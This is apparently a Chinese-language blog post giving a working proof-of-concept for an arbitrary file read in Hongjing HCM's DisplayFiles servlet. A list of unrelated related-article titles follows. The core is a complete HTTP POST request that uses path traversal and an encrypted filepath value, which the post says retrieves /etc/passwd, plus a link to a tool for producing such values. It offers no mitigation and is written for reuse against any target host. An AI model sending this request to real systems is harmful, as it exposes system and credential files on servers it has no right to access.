宏景HCM DisplayFiles任意檔案讀取

都吃泡芙發表於2024-06-14

漏洞復現：

POC：

點選檢視程式碼

POST /templates/attestation/../../servlet/DisplayFiles HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 63

filepath=RNcrjWtNfJnkUMbX1UB6VAPAATTP3HJDPAATTPPAATTP3HJDPAATTP

漏洞利用成功

其中filepath的加密為讀取/etc/passwd：

filepath=RNcrjWtNfJnkUMbX1UB6VAPAATTP3HJDPAATTPPAATTP3HJDPAATTP

工具地址：https://github.com/wafinfo/DecryptTools

宏景HCM 任意檔案讀取漏洞
2024-06-12
任意檔案讀取
2024-06-10
用友任意檔案讀取
2024-03-17
Mysql溯源-任意檔案讀取?
2021-12-30
MySql
Vmware Vcenter 任意檔案讀取漏洞
2020-10-14
新型任意檔案讀取漏洞的研究
2020-08-19
藍凌OA前臺任意檔案讀取漏洞利用
2022-03-03
JEEVMS倉庫管理系統任意檔案讀取漏洞
2024-05-19
MicrosoftEdge同源策略不嚴導致任意檔案讀取測試
2018-09-10
ROS
Hoverfly 任意檔案讀取漏洞(CVE-2024-45388)
2024-10-12
任意檔案讀取與下載的原理及修復
2024-08-17
致遠AnalyticsCloud分析雲任意檔案讀取漏洞復現
2024-07-28
Cloud
CSS-T | Mysql Client 任意檔案讀取攻擊鏈擴充
2020-01-15
CSSMySqlclient
Grafana 任意檔案讀取漏洞（CVE-2021-43798）學習
2021-12-12
Grafana
Java 讀取檔案
2021-01-17
Java
tiff檔案讀取
2013-05-20
python讀取檔案——python讀取和儲存mat檔案
2017-11-20
Python
viper 讀取配置檔案
2019-09-12
go配置檔案讀取
2018-11-02
Go
iOS讀取.csv檔案
2017-07-06
iOS
php 讀取超大檔案
2017-12-08
PHP
JAVA 讀取xml檔案
2010-12-23
JavaXML
WinForm讀取Excel檔案
2011-05-06
ORMExcel
java讀取properties檔案
2011-10-08
Java
前端讀取excel檔案
2024-06-08
前端Excel
IOC - 讀取配置檔案
2024-11-02
VB讀取文字檔案的例子：逐行讀取
2016-07-28
cocos讀取plist檔案
2019-05-11
go–讀取檔案的方式
2019-02-16
Go
Java系列：讀取XML檔案
2021-09-09
JavaXML
C#讀取Xml檔案
2018-11-26
C#XML
java中讀取配置檔案
2018-10-16
Java
matlab讀取npy檔案
2020-10-23
Matlab
pg從磁碟讀取檔案
2023-04-23
python小白檔案讀取
2020-09-28
Python
iOS如何讀取.db檔案
2018-01-26
iOS
python讀取大檔案
2018-07-04
Python
python 讀取csv檔案
2017-05-08
Python

宏景HCM DisplayFiles任意檔案讀取

相關文章